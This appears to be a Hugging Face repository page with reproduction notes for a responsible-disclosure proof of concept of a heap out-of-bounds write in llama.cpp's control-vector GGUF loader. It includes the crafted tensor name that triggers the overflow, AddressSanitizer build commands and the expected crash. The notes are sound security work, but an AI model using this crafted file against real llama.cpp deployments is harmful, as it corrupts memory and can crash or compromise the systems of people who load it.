Vassssilis
/

llama-cpp-control-vector-oob-write-poc

Model card Files Files and versions

llama-cpp-control-vector-oob-write-poc / REPRO.md

Vassssilis's picture

Upload 4 files

cddbb03 verified 12 days ago

|

History Blame Contribute Delete

2.28 kB

	# PoC: heap OOB write in llama.cpp control-vector GGUF loader

	`malicious_cv.gguf` triggers a heap out-of-bounds write in
	`common_control_vector_load_one()` when llama.cpp loads it as a control vector
	(`--control-vector`), via a signed-integer overflow in the buffer-size /
	write-offset arithmetic. Responsible-disclosure PoC for a huntr report. Not for malicious use.

	## Files
	- `malicious_cv.gguf` — malicious control-vector model: one tensor `direction.1431655766`, F32, `ne=[3]`.
	- `craft_cv_gguf.py` — how it was generated (`pip install gguf`, then `python craft_cv_gguf.py`).
	- `cv_load_harness.cpp` — minimal harness calling the public `common_control_vector_load()`.

	## Reproduce (Linux + AddressSanitizer)
	```bash
	git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp

	# Build the WHOLE tree (incl. the `common` lib) with AddressSanitizer.
	# (Note: -DGGML_SANITIZE_ADDRESS=ON alone only instruments ggml, NOT common —
	# use global flags so the control-vector loader is instrumented.)
	cmake -B build-asan -DCMAKE_BUILD_TYPE=Debug \
	-DCMAKE_C_FLAGS="-fsanitize=address -g -fno-omit-frame-pointer" \
	-DCMAKE_CXX_FLAGS="-fsanitize=address -g -fno-omit-frame-pointer" \
	-DBUILD_SHARED_LIBS=OFF -DLLAMA_CURL=OFF -DGGML_NATIVE=OFF
	cmake --build build-asan --target common -j"$(nproc)"

	# Build the harness against the ASan static libs (adjust .a paths to your tree).
	g++ -fsanitize=address -g -I. cv_load_harness.cpp \
	build-asan/common/libcommon.a build-asan/src/libllama.a build-asan/ggml/src/*.a \
	-lpthread -lm -o cv_load_harness

	./cv_load_harness malicious_cv.gguf
	```

	Expected: ASan reports `heap-buffer-overflow WRITE of size 4` in
	`common_control_vector_load_one` (`common/common.cpp:1865`), located **4 bytes
	before** the 8-byte buffer allocated by the overflowed `resize()` at
	`common/common.cpp:1860`. The harness also prints `n_embd=3 data_size=2`
	(the undersized buffer from the wrap).

	`dst[j] += …` is a read-modify-write, so a normal (halting) ASan build reports
	the OOB read first; build with `-fsanitize-recover=address` and run with
	`ASAN_OPTIONS=halt_on_error=0` to also surface the write.

	Also reproducible in the real tool:
	`llama-cli -m <any model> --control-vector malicious_cv.gguf -p hi` under ASan.